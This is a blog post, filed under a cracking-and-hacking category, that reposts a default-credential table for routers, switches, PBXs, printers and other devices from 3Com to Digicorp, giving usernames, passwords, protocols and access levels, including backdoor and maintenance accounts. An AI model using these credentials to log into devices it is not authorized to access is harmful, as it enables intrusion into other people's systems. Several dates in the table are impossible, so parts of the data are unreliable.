All about cracking $ hacking « Kareninaworld’s Blog

Archive for the ‘All about cracking $ hacking’ Category

Default passwords

December 8, 2007

well i Hope u ll figure out How to use it

this is just what i picked up from d net for better indexing of the site on meta engines.
explore d site u ll definitely encounter something new

Default Password List
Manufactor Product Revision Protocol UID Password Access comment Validated Created LastMod
3COM CoreBuilder 7000/6000/3500/2500 Telnet debug synnet No 2002-1-10 2005-13-7
3COM CoreBuilder 7000/6000/3500/2500 Telnet tech tech No 2002-1-10 2005-13-7
3COM HiPerARC v4.1.x Telnet adm (none) No 2002-1-10 2005-13-7
3COM LANplex 2500 Telnet debug synnet No 2002-1-10 2005-13-7
3COM LANplex 2500 Telnet tech tech No 2002-1-10 2005-13-7
3COM LinkSwitch 2000/2700 Telnet tech tech No 2002-1-10 2005-13-7
3COM NetBuilder SNMP ANYCOM snmp-read No 2002-1-10 2005-13-7
3COM NetBuilder SNMP ILMI snmp-read No 2002-1-10 2005-13-7
3COM Netbuilder Multi admin (none) Admin No 2002-1-10 2005-13-7
3COM Office Connect ISDN Routers 5×0 Telnet n/a PASSWORD Admin No 2002-1-10 2005-13-7
3COM SuperStack II Switch 2200 Telnet debug synnet No 2002-1-10 2005-13-7
3COM SuperStack II Switch 2700 Telnet tech tech No 2002-1-10 2005-13-7
3COM OfficeConnect 812 ADSL Multi adminttd adminttd Admin No 2002-1-10 2005-13-7
3COM Wireless AP ANY Multi admin comcomcom Admin Works on all 3com wireless APs No 2002-1-10 2005-13-7
3COM CellPlex 7000 Telnet tech tech User No 2002-1-10 2005-13-7
3COM cellplex 7000 Telnet admin admin Admin No 2002-1-10 2005-13-7
3COM HiPerARC v4.1.x Telnet adm (none) Admin No 2002-1-10 2005-13-7
3COM LANplex 2500 Telnet tech (none) Admin No 2002-1-10 2005-13-7
3COM CellPlex HTTP admin synnet Admin No 2002-1-10 2005-13-7
3COM SuperStack II Switch 2700 Telnet tech tech Admin No 2002-1-10 2005-13-7
3COM CellPlex 7000 Telnet root (none) Admin No 2002-1-10 2005-13-7
3COM HiPerACT v4.1.x Telnet admin (none) Admin No 2002-1-10 2005-13-7
3COM CellPlex 7000 Telnet tech (none) Admin No 2002-1-10 2005-13-7
3COM CellPlex 7000 Telnet admin admin Admin No 2002-1-10 2005-13-7
3COM SuperStack 3 4XXX Multi admin (none) Admin No 2003-1-8 2005-13-7
3COM SuperStack 3 4XXX Multi monitor monitor User No 2003-1-8 2005-13-7
3COM SuperStack 3 4400-49XX Multi manager manager User can access/change operational setting but not security settings Yes 2003-1-8 2005-13-7
3COM Netbuilder HTTP Root (none) Admin http://10.1.0.1 Yes 2004-24-2 2005-13-7
3COM 3C16450 Multi admin (none) Admin telnet or serial Yes 2004-24-2 2005-13-7
3COM 3C16406 Multi admin (none) Admin telnet or serial Yes 2004-24-2 2005-13-7
3COM Office Connect ISDN Routers 5×0 Telnet? n/a PASSWORD Admin No 2003-1-1 2005-13-7
3COM CoreBuilder 7000/6000/3500/2500 Telnet n/a admin Admin 2006-02-02 2006-02-02
3COM CoreBuilder 7000/6000/3500/2500 Telnet n/a (none) Admin 2006-02-09 2006-02-09
3COM OfficeConnect ADSL Wireless 11g Firewall Router 3CRWDR100-72 HTTP (none) admin Admin http://192.168.1.1 2006-03-25 2006-03-25
3Com Internet Firewall 3C16770 HTTP admin password Admin No 2004-12-7 2005-13-7
3Com Shark Fin Comcast-supplied HTTP User Password Diagnostics page 192.160.100.1 2006-06-14 2006-06-14
3M VOL-0215 etc. SNMP volition volition Admin for Volition fibre switches No 2002-19-10 2005-13-7
3c om 812 HTTP Administrator admin Admin 2006-01-28 2006-01-28
3com cellplex 7000 Telnet operator (none) Admin No 2002-1-10 2005-13-7
3com 3Com SuperStack 3 Switch 3300XM Multi security security Admin No 2002-1-10 2005-13-7
3com superstack II 1100/3300 Console 3comcso RIP000 initialize resets all pws to defaults No 2003-29-1 2005-13-7
3com NetBuilder SNMP (none) admin User SNMP_READ No 2002-1-10 2005-13-7
3com CellPlex 7000 Telnet tech tech Admin No 2002-1-10 2005-13-7
3com super Telnet admin (none) Admin No 2003-21-2 2005-13-7
3com cellplex 7000 Multi admin admin Admin RS-232/telnet Yes 2002-1-10 2005-13-7
3com CellPlex 7000 Telnet root (none) Admin No 2002-1-10 2005-13-7
3com Netbuilder Multi admin (none) Admin No 2002-1-10 2005-13-7
3com cellplex 7000 Telnet operator (none) Admin No 2002-1-10 2005-13-7
3com OfficeConnect 812 ADSL 01.50-01 Multi admin (none) Admin No 2002-1-10 2005-13-7
3com cellplex Multi admin admin Admin No 2002-1-10 2005-13-7
3com HiPerACT v4.1.x Telnet admin (none) Admin No 2002-1-10 2005-13-7
3com 3c16405 Multi n/a (none) Admin No 2002-1-10 2005-13-7
3com 3c16405 Console Administrator (none) Admin No 2002-1-10 2005-13-7
3com Switch 3300XM Multi admin admin Admin No 2002-1-10 2005-13-7
3com SS III Switch 4xxx (4900 – sure) Telnet recovery recovery resets_all_to_default u need to power off unit. tbl_ No 2003-19-7 2005-13-7
3com OfficeConnect Wireless 11g Cable/DSL Gateway HTTP (none) admin Admin No 2003-1-9 2005-13-7
3com 3C16405 Multi admin (none) Admin Yes 2002-1-10 2005-13-7
3com OfficeConnect 812 ADSL 01.50-01 Multi admin (none) Admin No 2002-1-10 2005-13-7
3com cellplex Multi n/a (none) Admin No 2002-1-10 2005-13-7
3com cellplex Multi admin admin Admin No 2002-1-10 2005-13-7
3com HiPerACT v4.1.x Telnet admin (none) Admin No 2002-1-10 2005-13-7
3com 3c16405 Console Administrator (none) Admin No 2002-1-10 2005-13-7
3com CellPlex 7000 Telnet tech (none) Admin No 2002-1-10 2005-13-7
3com Switch 3300XM Multi admin admin Admin No 2002-1-10 2005-13-7
3com SS III Switch 4xxx (4900 – sure) Telnet recovery recovery resets_all_to_default u need to power off unit. tbl_ No 2003-19-7 2005-13-7
3com OfficeConnect Wireless 11g Cable/DSL Gateway HTTP (none) admin Admin No 2003-1-9 2005-13-7
3com 3CRADSL72 1.2 Multi (none) 1234admin Admin snmp open by default with public / private community No 2004-23-3 2005-13-7
3com CB9000 / 4007 3 Console Type User: FORCE (none) Admin This will recover a lost password and reset the switch config to Factory Default No 2004-24-3 2005-13-7
3com officeconnect Multi n/a (none) Admin No 2004-3-6 2005-13-7
3com superstack II Netbuilder 11.1 Multi n/a (none) Admin No 2004-21-8 2005-13-7
3com officeconnect Multi admin (none) Admin 2006-02-16 2006-02-16
3com office connect 11g Multi admin (none) User 2006-02-16 2006-02-16
3com LANplex 2500 Telnet n/a admin Admin 2006-09-20 2006-09-20
3ware 3DM HTTP Administrator 3ware Admin 2006-05-26 2006-05-26
ACCTON Wirelessrouter T-online HTTP none 0 Admin YEAHH No 2004-28-1 2005-13-7
ADC Kentrox Pacesetter Router Telnet n/a secret No 2002-1-10 2005-13-7
ADIC Scalar 100/1000 HTTP admin secure Admin No 2004-11-5 2005-13-7
ADIC Scalar i2000 Multi admin password Admin No 2005-13-3 2005-13-7
ALCATEL 4400 Console mtcl (none) User 2006-05-29 2006-05-29
ALLNET T-DSL Modem Software Version: v1.51 HTTP admin admin Admin No 2003-16-1 2005-13-7
AMBIT ADSL Telnet root (none) Admin No 2002-1-10 2005-13-7
AOC zenworks 4.0 Multi n/a admin Admin No 2004-22-5 2005-13-7
APC 9606 Smart Slot Telnet n/a backdoor Admin No 2004-9-2 2005-13-7
APC USV Network Management Card SNMP n/a TENmanUFactOryPOWER Admin nachzulesen unter http://www.heise.de/security/news/meldung/44899 gruss HonkHase No 2004-23-1 2005-13-7
APC UPSes (Web/SNMP Mgmt Card) HTTP device device Admin Secondary access account (next to apc/apc) No 2004-19-7 2005-13-7
APC Smart UPS Multi apc apc Admin No 2005-9-2 2005-13-7
ARtem ComPoint – CPD-XT-b CPD-XT-b Telnet (none) admin Admin No 2005-10-1 2005-13-7
ASMAX AR701u / ASMAX AR6024 HTTP admin epicrouter Admin 2006-03-18 2006-03-18
ASMAX AR800C2 HTTP admin epicrouter Admin 2006-03-18 2006-03-18
ASMAX AR800C2 HTTP admin epicrouter Admin 2006-03-18 2006-03-18
ASUS WL-500G 1.7.5.6 HTTP admin admin Admin 2005-10-24 2005-10-24
AVAYA g3R v6 Console root ROOT500 Admin No 2002-1-10 2005-13-7
AVAYA Cajun P33x firmware before 3.11.0 SNMP n/a admin Admin check the Bugtraq archives for more information No 2002-1-10 2005-13-7
AXUS AXUS YOTTA Multi n/a 00000000 Admin Storage DAS SATA to SCSI/FC 2006-03-07 2006-03-07
Accelerated Networks DSL CPE and DSLAM Telnet sysadm anicust No 2002-1-10 2005-13-7
Aceex Modem ADSL Router HTTP admin (none) Admin No 2004-15-2 2005-13-7
Aceex Modem ADSL Router HTTP admin (none) Admin No 2004-15-2 2005-13-7
Actiontec Wireless Broadband Router Multi admin password Admin Verizon Fios Setup 2006-10-13 2006-10-13
Advantek Networks Wireless LAN 802.11 g/b Multi admin (none) Admin http://www.advanteknetworks.com/ 2006-00-07 2006-00-07
Aethra Starbridge EU HTTP admin password Admin 2006-00-23 2006-00-23
AirTies RT-210 AirTies RT-210 AirTies RT-210 Telnet admin admin Admin AirTies RT-210 2006-08-06 2006-08-06
Alcatel PBX 4400 Port 2533 kermit kermit unknown thanks to Nicolas Gregoire Yes 2002-1-10 2005-13-7
Alcatel PBX 4400 Port 2533 dhs3mt dhs3mt unknown thanks to Nicolas Gregoire Yes 2002-1-10 2005-13-7
Alcatel PBX 4400 Port 2533 at4400 at4400 unknown thanks to Nicolas Gregoire Yes 2002-1-10 2005-13-7
Alcatel PBX 4400 Port 2533 mtch mtch unknown thanks to Nicolas Gregoire Yes 2002-1-10 2005-13-7
Alcatel PBX 4400 Port 2533 mtcl mtcl unknown thanks to Nicolas Gregoire Yes 2002-1-10 2005-13-7
Alcatel PBX 4400 Port 2533 root letacla unknown thanks to Nicolas Gregoire Yes 2002-1-10 2005-13-7
Alcatel PBX 4400 Port 2533 dhs3pms dhs3pms unknown thanks to Nicolas Gregoire Yes 2002-1-10 2005-13-7
Alcatel PBX 4400 Port 2533 adfexc adfexc unknown thanks to Nicolas Gregoire Yes 2002-1-10 2005-13-7
Alcatel PBX 4400 Port 2533 client client unknown Yes 2002-1-10 2006-05-28
Alcatel PBX 4400 Port 2533 install llatsni unknown thanks to Nicolas Gregoire Yes 2002-1-10 2005-13-7
Alcatel PBX 4400 Port 2533 halt tlah unknown thanks to Nicolas Gregoire Yes 2002-1-10 2005-13-7
Alcatel Office 4200 Multi n/a 1064 Admin by Bazille No 2002-1-10 2005-13-7
Alcatel OmniStack 6024 Telnet admin switch Admin Yes 2002-1-10 2005-13-7
Alcatel Omnistack/Omniswitch Telnet/Console diag switch Admin Yes 2003-22-7 2005-13-7
Alcatel Omnistack/omniswitch Telnet diag switch Admin No 2004-27-5 2005-13-7
Alcatel Timestep VPN 1520 3.00.026 Permit config and console root permit Admin Perm/Config port 38036 No 2004-16-7 2005-13-7
Alcatel OXO 1.3 Multi (none) admin User No 2005-28-3 2005-13-7
Alcatel OmniPCX Office 4.1 FTP ftp_inst pbxk1064 Installer 2006-04-23 2006-04-23
Alcatel OmniPCX Office 4.1 FTP ftp_admi kilo1987 Admin 2006-04-23 2006-04-23
Alcatel OmniPCX Office 4.1 FTP ftp_oper help1954 Operator 2006-04-23 2006-04-23
Alcatel OmniPCX Office 4.1 FTP ftp_nmc tuxalize NMC 2006-04-23 2006-04-23
Allied Telesyn Multi manager friend Admin No 2002-1-10 2005-13-7
Allied Telesyn AT-8024(GB) Console n/a admin Admin No 2002-1-10 2005-13-7
Allied Telesyn AT-8024(GB) HTTP manager admin Admin No 2002-1-10 2005-13-7
Allied Telesyn AT Router HTTP root (none) Admin No 2004-21-11 2005-13-7
Allied Telesyn ALAT8326GB Multi manager manager Admin 2005-09-02 2005-09-02
Allied Telesyn AT8016F Console manager friend Admin 2005-09-26 2005-09-26
Allied Telesyn AT-AR130 (U) -10 HTTP Manager friend Admin Default IP is 192.168.242.242 2006-05-09 2006-05-09
Allnet ALL0275 802.11g AP 1.0.6 HTTP none admin Admin No 2003-26-9 2005-13-7
Alteon ACEDirector3 console admin (none) No 2002-1-10 2005-13-7
Alteon ACEswitch 180e HTTP admin admin Admin No 2002-1-10 2005-13-7
Alteon ACEswitch 180e Telnet admin (none) No 2002-1-10 2005-13-7
Alteon ACEswitch 180e HTTP admin linga Admin none No 2002-1-10 2005-13-7
Alteon AD4 9 Console admin admin Admin Factory default No 2004-20-4 2005-13-7
Ambit Cable Modem 60678eu 1.12 Multi root root Admin No 2004-5-1 2005-13-7
Ambit Cable Modem Multi root root Admin Time Warner Cable issued modem No 2004-27-1 2005-13-7
Ambit ntl:home 200 2.67.1011 HTTP root root Admin This is the cable modem supplied by NTL in the UK No 2004-6-7 2005-13-7
Amitech wireless router and access point 802.11g 802.11b any HTTP admin admin Admin Web interface is on 192.168.1.254 available on the LAN ports of the AP. No 2005-6-2 2005-13-7
Andover Controls Infinity any Console acc acc Admin Building managment system No 2003-2-11 2005-13-7
Apple AirPort Base Station (Graphite) 2 Multi (none) public public See Apple article number 58613 for details No 2003-25-8 2005-13-7
Apple Airport Base Station (Dual Ethernet) 2 Multi n/a password Guest See Apple article number 106597 for details No 2003-25-8 2005-13-7
Apple Airport Extreme Base Station 2 Multi n/a admin Guest see Apple article number 107518 for details No 2003-25-8 2005-13-7
Areca RAID controllers Console admin 0000 Admin 2005-08-28 2005-08-28
Arescom modem/router 10XX Telnet n/a atc123 Admin No 2004-18-9 2005-13-7
Asante IntraSwitch multi IntraSwitch Asante Admin No 2002-1-10 2005-13-7
Asante IntraStack multi IntraStack Asante Admin No 2002-1-10 2005-13-7
Asante FM2008 Telnet superuser (none) Admin No 2004-16-11 2005-13-7
Asante FM2008 Multi admin asante Admin 2006-02-01 2006-02-01
Ascend Yurie Multi readonly lucenttech2 No 2002-1-10 2005-13-7
Ascend Router Telnet n/a ascend Admin No 2002-1-10 2005-13-7
Ascend Sahara Multi root ascend No 2002-1-10 2005-13-7
Ascom Ascotel PBX ALL Multi (none) 3ascotel Admin no user req. _by DTK No 2003-13-5 2005-13-7
Asmax Ar-804u HTTP admin epicrouter Admin 2006-04-11 2006-04-11
Aspect ACD 6 HTTP customer none User views error logs No 2002-1-10 2005-13-7
Aspect ACD 6 Oracle DTA TJM User No 2002-1-10 2005-13-7
Aspect ACD 7 Oracle DTA TJM User No 2002-1-10 2005-13-7
Aspect ACD 8 Oracle DTA TJM User No 2002-1-10 2005-13-7
Asus wl503g All HTTP admin admin Admin 2005-07-17 2005-07-17
Asus wl500 All HTTP admin admin Admin 2005-07-17 2005-07-17
Asus wl300 All HTTP admin admin Admin 2005-07-17 2005-07-17
Asus WL500g Deluxe HTTP admin admin Admin 2006-02-18 2006-02-18
Asus P5P800 Multi n/a admin User 2006-03-09 2006-03-09
Atlantis A02-RA141 Multi admin atlantis Admin 2006-06-19 2006-06-19
Atlantis I-Storm Lan Router ADSL Multi admin atlantis Admin (submit by fedematico) 2006-06-21 2006-06-21
Avaya Definity G3Si Multi craft (none) Admin No 2002-1-10 2005-13-7
Avaya Cajun Pxxx Multi root root Admin No 2002-1-10 2005-13-7
Avaya Cajun P550R P580 P880 and P882 Multi diag danger Developer No 2002-16-9 2005-13-7
Avaya Cajun P550R P580 P880 and P882 Multi manuf xxyyzz Developer No 2002-16-9 2005-13-7
Avaya Pxxx 5.2.14 Multi diag danger Admin No 2002-16-9 2005-13-7
Avaya Pxxx 5.2.14 Multi manuf xxyyzz Admin No 2002-16-9 2005-13-7
Avaya definity up to rev. 6 any craft crftpw Admin No 2003-23-3 2005-13-7
Avaya CMS Supervisor 11 Console root cms500 Admin No 2004-1-1 2005-13-7
Avaya Definity Multi dadmin dadmin01 Admin 2005-08-29 2005-08-29
Axis NETCAM 200/240 Telnet root pass Admin Yes 2002-1-10 2005-13-7
Axis All Axis Printserver All Multi root pass Admin No 2004-17-5 2005-13-7
Axis Webcams HTTP root pass Admin No 2004-21-11 2005-13-7
Axis 540/542 Print Server Multi root pass Admin No 2005-12-1 2005-13-7
Axis NETCAM 200/240 root pass No 2003-1-1 2005-13-7
BBR-4MG and BBR-4HG BUFFALO ALL HTTP root n/a Admin 2005-10-12 2005-10-12
BMC Patrol 6 Multi patrol patrol User No 2002-1-10 2005-13-7
BMC Software Patrol all BMC unique Administrator the same all over Admin this default user normally for ALL system in this area with one Password Yes 2003-6-1 2005-13-7
Bausch Datacom Proxima PRI ADSL PSTN Router4 Wireless Multi admin epicrouter Admin 2006-01-09 2006-01-09
Bay Networks Switch 350T Telnet n/a NetICs Admin No 2002-1-10 2005-13-7
Bay Networks SuperStack II Telnet security security Admin No 2002-1-10 2005-13-7
Bay Networks Router Telnet User (none) User No 2002-1-10 2005-13-7
Bay Networks Router Telnet Manager (none) Admin No 2002-1-10 2005-13-7
Bay Networks Router User (none) User No 2003-1-1 2005-13-7
Bay Networks SuperStack II security security Admin No 2003-1-1 2005-13-7
Bay Networks Switch 350T n/a NetICs Admin No 2003-1-1 2005-13-7
Belkin F5D6130 SNMP (none) MiniAP Admin Wireless Acess Point IEEE802.11b No 2003-26-3 2005-13-7
Belkin F5D7150 FB Multi n/a admin Admin No 2005-11-2 2005-13-7
Benq awl 700 wireless router 1.3.6 Beta-002 Multi admin admin Admin 2005-06-20 2005-06-20
Billion Bipac 5100 HTTP admin admin Admin No 2004-30-4 2005-13-7
Billion BIPAC-640 AC 640AE100 HTTP (none) (none) Admin 2005-11-14 2005-11-14
BinTec Bianca/Brick XM-5.1 SNMP n/a snmp-Trap read/write by rootkid No 2003-23-3 2005-13-7
BinTec x1200 37834 Multi admin bintec Admin No 2003-1-8 2005-13-7
BinTec x2300i 37834 Multi admin bintec Admin No 2003-1-8 2005-13-7
BinTec x3200 37834 Multi admin bintec Admin No 2003-1-8 2005-13-7
Bintec Bianka Routers Multi admin bintec Admin No 2002-1-10 2005-13-7
Blue Coat Systems ProxySG 3.x HTTP admin articon Admin access to command line interface via ssh and web gui 2005-11-14 2005-11-14
Bluecoat ProxySG (all model) SGOS 3 / SGOS4 HTTPS (8082) admin admin Admin 2006-09-10 2006-09-10
Breezecom Breezecom Adapters 3.x n/a Master Admin No 2002-1-10 2005-13-7
Breezecom Breezecom Adapters 2.x n/a laflaf Admin No 2002-1-10 2005-13-7
Breezecom Breezecom Adapters 4.4.x Console n/a Helpdesk Admin No 2004-30-4 2005-13-7
Breezecom Breezecom Adapters 4.x n/a Super No 2003-1-1 2005-13-7
Breezecom Breezecom Adapters 3.x n/a Master No 2003-1-1 2005-13-7
Breezecom Breezecom Adapters 2.x n/a laflaf No 2003-1-1 2005-13-7
Broadlogic XLT router HTTP webadmin webadmin Admin 2006-02-01 2006-02-01
Broadlogic XLT router Telnet admin admin Admin 2006-02-01 2006-02-01
Broadlogic XLT router Telnet installer installer Admin 2006-02-01 2006-02-01
Brocade Fabric OS All Multi root fivranne Admin Gigiabit SAN (by Nicolas Gregoire) No 2003-4-8 2005-13-7
Brocade Silkworm all Multi admin password Admin Also on other Fiberchannel switches No 2003-25-7 2005-13-7
Brocade Fabric OS Multi admin password Admin Gigabit SAN No 2003-4-8 2005-13-7
Brother NC-3100h (none) access network board access No 2002-1-10 2005-13-7
Brother NC-4100h (none) access network board access No 2002-1-10 2005-13-7
Brother HL-1270n Multi n/a access network board access No 2002-1-10 2005-13-7
Brother NC-2100p Multi (none) access Admin NC-2100p Print Server 2006-08-16 2006-08-16
Buffalo Wireless Broadband Base Station-g WLA-G54 WBR-G54 HTTP root (none) Admin http://192.168.11.1 Yes 2004-13-1 2005-13-7
CISCO Cache Engine Console admin diamond Admin No 2002-1-10 2005-13-7
CNET CNET 4PORT ADSL MODEM CNAD NF400 Multi admin epicrouter Admin 2006-02-02 2006-02-02
CNET CSH-2400W unk HTTP admin 1234 Admin 2006-08-05 2006-08-05
COM3 OLe HTTP admin admin User No 2002-1-10 2005-13-7
CTC Union ATU-R130 81001a Multi root root Admin 2006-06-13 2006-06-13
Cable And Wireless ADSL Modem/Router Multi admin 1234 Admin 2006-03-30 2006-03-30
Cabletron Netgear modem/router and SSR netman (none) Admin No 2002-1-10 2005-13-7
Cayman Cayman DSL n/a (none) Admin No 2003-1-1 2005-13-7
Celerity Mediator Multi Multi mediator mediator User No 2002-26-11 2005-13-7
Celerity Mediator Multi root Mau'dib Admin Assumption: the password is Mua'dib No 2002-26-11 2005-13-7
Cellit CCPro Multi cellit cellit Admin No 2003-10-6 2005-13-7
Checkpoint SecurePlatform NG FP3 Console admin admin Admin No 2002-14-10 2005-13-7
CipherTrust IronMail Any Multi admin password Admin No 2005-18-4 2005-13-7
Cisco ConfigMaker cmaker cmaker Admin No 2002-1-10 2005-13-7
Cisco CNR All CNR GUI admin changeme Admin This is the default password for Cisco Network Registrar No 2002-1-10 2005-13-7
Cisco Netranger/secure IDS Multi netrangr attack No 2002-1-10 2005-13-7
Cisco BBSM 5.0 and 5.1 Telnet or Named Pipes bbsd-client changeme2 database The BBSD Windows Client password will match the BBSD MSDE Client password No 2002-1-10 2005-13-7
Cisco BBSD MSDE Client 5.0 and 5.1 Telnet or Named Pipes bbsd-client NULL database The BBSD Windows Client password will match the BBSD MSDE Client password No 2002-1-10 2005-13-7
Cisco BBSM Administrator 5.0 and 5.1 Multi Administrator changeme Admin No 2002-1-10 2005-13-7
Cisco Netranger/secure IDS 3.0(5)S17 Multi root attack Admin must be changed at the first connection No 2002-1-10 2005-13-7
Cisco BBSM MSDE Administrator 5.0 and 5.1 IP and Named Pipes sa (none) Admin No 2002-1-10 2005-13-7
Cisco Catalyst 4000/5000/6000 All SNMP (none) public/private/secret RO/RW/RW+change SNMP config default on All Cat switches running the native CatOS CLI software. No 2003-14-2 2005-13-7
Cisco PIX firewall Telnet (none) cisco User No 2002-1-10 2005-13-7
Cisco VPN Concentrator 3000 series 3 Multi admin admin Admin No 2003-29-4 2005-13-7
Cisco Content Engine Telnet admin default Admin No 2003-6-6 2005-13-7
Cisco AP1200 IOS Multi Cisco Cisco Admin This is when you convert AP1200 or AP350 to IOS No 2003-15-11 2005-13-7
Cisco CiscoWorks 2000 guest (none) User No 2003-1-1 2005-13-7
Cisco CiscoWorks 2000 admin cisco Admin No 2003-1-1 2005-13-7
Cisco ConfigMaker cmaker cmaker Admin No 2003-1-1 2005-13-7
Cisco Ciso Aironet 1100 series Rev. 01 HTTP (none) Cisco Admin 2005-07-02 2005-07-02
Cisco Aironet Multi (none) _Cisco Admin 2006-02-01 2006-02-01
Cisco Aironet Multi Cisco Cisco Admin 2006-02-01 2006-02-01
Cisco HSE Multi root blender Admin 2006-02-01 2006-02-01
Cisco HSE Multi hsa hsadb Admin 2006-02-01 2006-02-01
Cisco WLSE Multi root blender Admin 2006-02-01 2006-02-01
Cisco WLSE Multi wlse wlsedb Admin 2006-02-01 2006-02-01
Cisco Aironet 1200 HTTP root Cisco Admin 2006-02-22 2006-02-22
Cisco CallManager HTTP admin admin Admin nabil ouchn 2006-08-14 2006-08-14
Cisco WSLE all all wlseuser wlsepassword User see also enable passwd 2006-08-14 2006-08-14
Cisco WLSE all Console enable (none) enable use with wlseuser 2006-08-14 2006-08-14
Cisco Cisco Wireless Location Appliance 2700 Series prior to 2.1.34.0 Multi root password Admin Added by DPL admin. From http://www.securitytracker.com/alerts/2006/Oct/1017056 Yes 2006-09-15 2006-10-15
Cisco MeetingPlace Console technician 2 + last 4 of Audio Server chasis Serial case-sensitive + 561384 Admin Used for Audio Server or MeetingTime software 2006-09-21 2006-09-21
Cisco-Arrowpoint Arrowpoint admin system Admin No 2002-1-10 2005-13-7
Compaq Insight Manager administrator administrator Admin No 2002-1-10 2005-13-7
Compaq Insight Manager anonymous (none) User No 2002-1-10 2005-13-7
Compaq Insight Manager user user User No 2002-1-10 2005-13-7
Compaq Insight Manager operator operator No 2002-1-10 2005-13-7
Compaq Insight Manager user public User No 2002-1-10 2005-13-7
Compaq Insight Manager PFCUser 240653C9467E45 User No 2002-1-10 2005-13-7
Conexant Router HTTP n/a epicrouter Admin 2006-00-07 2006-00-07
Conexant Router HTTP n/a admin Admin yes 2006-01-21 2006-01-21
Corecess Corecess 3112 HTTP Administrator admin Admin No 2004-5-5 2005-13-7
Corecess 6808 APC Telnet corecess corecess User 2006-00-18 2006-00-18
Cyclades PR 1000 Telnet super surt Admin mpacheco.inimigo.com No 2005-01-31 2005-13-7
Cyclades TS800 HTTP root tslinux Admin mpacheco.inimigo.com No 2005-01-31 2005-13-7
D-LINK DSL-G664T A1 HTTP admin admin Admin SSID : G664T_WIRELESS No 2004-9-7 2005-13-7
D-Link hubs/switches Telnet D-Link D-Link No 2002-1-10 2005-13-7
D-Link DI-704 rev a Multi (none) admin Admin Cable/DSL Routers/Switches Yes 2002-1-10 2005-13-7
D-Link DI-804 v2.03 Multi admin (none) Admin Contributed by _CR_ No 2002-1-10 2005-13-7
D-Link DWL 900AP Multi (none) public Admin Yes 2003-1-4 2005-13-7
D-Link DI-614+ HTTP user (none) User by rootkid No 2003-21-3 2005-13-7
D-Link DWL-614+ rev a rev b HTTP admin (none) Admin http://192.168.0.1 Yes 2002-12-10 2005-13-7
D-Link D-704P rev b Multi admin (none) Admin Yes 2003-15-1 2005-13-7
D-Link DI-604 rev a rev b rev c rev e Multi admin (none) Admin http://192.168.0.1 Yes 2003-18-6 2005-13-7
D-Link DWL-614+ 2.03 HTTP admin (none) Admin No 2002-12-10 2005-13-7
D-Link D-704P Multi admin admin Admin No 2003-15-1 2005-13-7
D-Link DWL-900+ HTTP admin (none) Admin No 2003-14-2 2005-13-7
D-Link DI-704 Multi n/a admin Admin No 2003-26-7 2005-13-7
D-Link DI-604 1.62b+ HTTP admin (none) Admin No 2003-30-7 2005-13-7
D-Link DI-624 all HTTP admin (none) Admin No 2003-25-8 2005-13-7
D-Link DI-624 all HTTP User (none) Admin No 2003-25-8 2005-13-7
D-Link DI-604 2.02 HTTP admin admin Admin No 2003-30-10 2005-13-7
D-Link DWL 1000 HTTP admin (none) Admin No 2004-25-2 2005-13-7
D-Link DI-514 Multi user (none) Admin No 2004-1-4 2005-13-7
D-Link DI-614+ any HTTP admin (none) Admin all access No 2004-15-4 2005-13-7
D-Link DWL 2100AP Multi admin (none) Admin No 2004-7-7 2005-13-7
D-Link DSL-302G Multi admin admin Admin No 2004-14-10 2005-13-7
D-Link DI-624+ A3 HTTP admin admin Admin No 2004-5-11 2005-13-7
D-Link DWL-2000AP+ 1.13 HTTP admin (none) Admin Wireless Access Point No 2004-24-11 2005-13-7
D-Link DI-614+ HTTP admin admin Admin No 2005-28-2 2005-13-7
D-Link Dsl-300g+ Teo Telnet (none) private Admin 2005-11-12 2005-11-12
D-Link DSL-300g+ Teo HTTP admin admin Admin 2005-11-12 2005-11-12
D-Link DI-524 all HTTP admin (none) Admin http://192.168.0.1 2005-11-21 2005-11-21
D-Link firewall dfl-200 HTTP admin admin Admin 2006-02-04 2006-02-04
D-Link DI-524 all HTTP user (none) User 2006-05-20 2006-05-20
D-Link DI-634M Multi admin (none) Admin 2006-10-13 2006-10-13
D-link DWL-900AP+ rev a rev b rev c HTTP admin (none) Admin http://192.168.0.50 No 2003-14-2 2005-13-7
D-link DSL500G Multi admin admin Admin 2006-03-07 2006-03-07
D-link DSL-504T HTTP admin admin Admin 2006-03-18 2006-03-18
D-link DSL-G604T Multi admin admin Admin 2006-03-18 2006-03-18
D-link Di-707p router HTTP admin (none) Admin 2006-02-25 2006-02-25
DI624 D-LINK C3 HTTP admin password Admin hardcoded for Verizon FiOS 2006-04-03 2006-04-03
DLINK 604 Multi n/a admin Admin No 2006-07-17 2006-08-23
Dallas Semiconductors TINI embedded JAVA Module <= 1.0 Telnet root tini Admin No 2002-1-10 2005-13-7
Datacom BSASX/101 n/a letmein Admin No 2002-1-10 2005-13-7
Datawizard.net FTPXQ server FTP anonymous any@ read/write on c:\ No 2002-1-10 2005-13-7
Davox Unison Multi root davox Admin No 2003-10-6 2005-13-7
Davox Unison Multi admin admin User No 2003-10-6 2005-13-7
Davox Unison Multi davox davox User No 2003-10-6 2005-13-7
Davox Unison Sybase sa (none) Admin No 2003-10-6 2005-13-7
Deerfield MDaemon HTTP MDaemon MServer Admin web interface to manage MDaemon. fixed June 2002 No 2003-22-6 2005-13-7
Dell Laser Printer 3000cn / 3100cn HTTP admin password Admin 2005-09-26 2005-09-26
Dell Remote Access Card HTTP root calvin Admin 2006-03-11 2006-03-11
Demarc Network Monitor multi admin my_DEMARC Admin No 2002-1-10 2005-13-7
Deutsch Telekomm T-Sinus 130 DSL HTTP (none) 0000 Admin No 2005-06-14 2005-07-16
Deutsche Telekom T-Sinus DSL 130 HTTP admin (none) Admin Usuallay also a WirelessLan AP No 2003-1-1 2005-13-7
Deutsche Telekom T-Sinus 154 DSL 13.9.38 HTTP (none) 0000 Admin thx to AwdCzAb 2006-04-10 2006-04-10
Deutsche Telekom T-Sinus 1054 DSL All HTTP (none) 0000 Admin 2006-10-20 2006-10-20
Develcon Orbitor Default Console n/a BRIDGE Admin No 2002-1-10 2005-13-7
Develcon Orbitor Default Console n/a password Admin No 2002-1-10 2005-13-7
Dictaphone ProLog PBX PBX No 2002-1-10 2005-13-7
Dictaphone ProLog NETWORK NETWORK No 2002-1-10 2005-13-7
Dictaphone ProLog NETOP (none) No 2002-1-10 2005-13-7
Digicom Michelangelo Multi admin michelangelo Admin 2006-02-01 2006-02-01
Digicom Michelangelo Multi user password User 2006-02-01 2006-02-01
Digicorp Viper Telnet n/a BRIDGE Admin No 2002-1-10 2005-13-7
Digicorp Viper Telnet n/a password Admin No 2002-1-10 2005-13-7
Digicorp Router n/a BRIDGE Admin No 2003-1-1 2005-13-7
